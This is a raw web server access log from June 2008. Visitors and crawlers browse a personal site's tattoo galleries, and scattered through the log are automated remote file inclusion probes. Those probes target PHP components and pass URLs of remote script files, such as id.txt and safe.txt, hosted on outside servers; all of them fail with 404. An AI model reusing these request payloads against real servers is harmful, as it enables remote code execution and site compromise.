212.34.140.215 - - [12/Jun/2008:07:50:46 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jun/2008:07:50:46 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
87.106.101.24 - - [12/Jun/2008:07:51:26 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:07:51:26 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
207.58.171.40 - - [12/Jun/2008:07:52:54 -0500] "GET /index2.php?x=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 294 "-""Mozilla/4.61 [en] (OS/2; U)"
207.58.171.40 - - [12/Jun/2008:07:52:55 -0500] "GET /logs/index2.php?x=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 299 "-""Mozilla/4.61 [en] (OS/2; U)"
82.102.10.211 - - [12/Jun/2008:07:54:44 -0500] "GET /logs/index1.php?x=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:07:54:44 -0500] "GET /index1.php?x=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.118.88.84 - - [12/Jun/2008:07:55:48 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
64.118.88.84 - - [12/Jun/2008:07:55:48 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
190.34.160.226 - - [12/Jun/2008:07:55:52 -0500] "GET /logs/index.php?site1=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:07:55:55 -0500] "GET /logs/index.php?site1=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:07:55:57 -0500] "GET /index.php?site1=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:07:55:59 -0500] "GET /index.php?site1=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.2.100.138 - - [12/Jun/2008:07:59:25 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:07:59:26 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
160.99.12.231 - - [12/Jun/2008:07:59:48 -0500] "GET /logs//mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 297 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:07:59:49 -0500] "GET //mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 292 "-""libwww-perl/5.65"
74.6.22.89 - - [12/Jun/2008:08:00:50 -0500] "GET /logs/access_log.1169251200 HTTP/1.0" 200 208719 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.48.67.39 - - [12/Jun/2008:08:01:10 -0500] "GET /logs//mcf.php?content=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
210.48.67.39 - - [12/Jun/2008:08:01:10 -0500] "GET //mcf.php?content=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
195.195.161.242 - - [12/Jun/2008:08:08:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:34 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:34 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:42 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:52 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1991 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.0" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd3.JPG HTTP/1.0" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd2.JPG HTTP/1.0" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd4.JPG HTTP/1.0" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd6.JPG HTTP/1.0" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd7.JPG HTTP/1.0" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd10.JPG HTTP/1.0" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd8.JPG HTTP/1.0" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/tatd9.JPG HTTP/1.0" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:08:53 -0500] "GET /tattoo/msameric.JPG HTTP/1.0" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
212.241.217.240 - - [12/Jun/2008:08:09:00 -0500] "GET /logs/modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
212.241.217.240 - - [12/Jun/2008:08:09:00 -0500] "GET /modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
74.6.22.89 - - [12/Jun/2008:08:09:25 -0500] "GET /logs/access_log.1180656000 HTTP/1.0" 200 102064 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.195.161.242 - - [12/Jun/2008:08:09:38 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:38 -0500] "GET /tattoo/tat1.JPG HTTP/1.0" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:38 -0500] "GET /tattoo/tat3.jpg HTTP/1.0" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:38 -0500] "GET /tattoo/tat10.JPG HTTP/1.0" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:38 -0500] "GET /tattoo/tat2.JPG HTTP/1.0" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.0" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat6.JPG HTTP/1.0" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.0" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.0" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.0" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.0" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:59 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:59 -0500] "GET /tattoo/tatb10.JPG HTTP/1.0" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:59 -0500] "GET /tattoo/tatb2.JPG HTTP/1.0" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:59 -0500] "GET /tattoo/tatb1.JPG HTTP/1.0" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:09:59 -0500] "GET /tattoo/tatb3.JPG HTTP/1.0" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb4.JPG HTTP/1.0" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb5.JPG HTTP/1.0" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb6.JPG HTTP/1.0" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb7.JPG HTTP/1.0" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb8.JPG HTTP/1.0" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:00 -0500] "GET /tattoo/tatb9.JPG HTTP/1.0" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:22 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:23 -0500] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:10:24 -0500] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:11:14 -0500] "GET /tattoo/bonus.htm HTTP/1.0" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:11:14 -0500] "GET /tattoo/tate3.JPG HTTP/1.0" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:11:14 -0500] "GET /tattoo/tate4.JPG HTTP/1.0" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.195.161.242 - - [12/Jun/2008:08:11:14 -0500] "GET /tattoo/tate2.JPG HTTP/1.0" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
74.6.22.89 - - [12/Jun/2008:08:12:45 -0500] "GET /logs/access_log.1169510400 HTTP/1.0" 200 260669 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.30.73.117 - - [12/Jun/2008:08:16:10 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:08:16:11 -0500] "GET //Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
64.118.88.84 - - [12/Jun/2008:08:16:55 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
64.118.88.84 - - [12/Jun/2008:08:16:55 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
64.118.88.84 - - [12/Jun/2008:08:17:22 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
64.118.88.84 - - [12/Jun/2008:08:17:22 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
211.234.107.233 - - [12/Jun/2008:08:18:43 -0500] "GET /logs/access_log.1208649600//index1.php?id=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
211.234.107.233 - - [12/Jun/2008:08:18:44 -0500] "GET //index1.php?id=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.234.107.233 - - [12/Jun/2008:08:18:44 -0500] "GET /logs//index1.php?id=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:08:18:55 -0500] "GET /logs//mcf.php?content=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:08:18:55 -0500] "GET //mcf.php?content=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
89.108.67.59 - - [12/Jun/2008:08:20:59 -0500] "GET /logs/modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://alieandrann.net/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.108.67.59 - - [12/Jun/2008:08:20:59 -0500] "GET /modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://alieandrann.net/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.221.143.111 - - [12/Jun/2008:08:21:40 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.65"
202.221.143.111 - - [12/Jun/2008:08:21:41 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.65"
66.249.70.213 - - [12/Jun/2008:08:23:36 -0500] "GET /logs/?N=A HTTP/1.1" 200 87185 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.30.73.117 - - [12/Jun/2008:08:27:08 -0500] "GET //Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
209.240.231.154 - - [12/Jun/2008:08:30:29 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
209.240.231.154 - - [12/Jun/2008:08:30:29 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
124.87.2.228 - - [12/Jun/2008:08:32:00 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:00 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:00 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:05 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:05 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:05 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:06 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:06 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:06 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:06 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:06 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:07 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:07 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:07 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
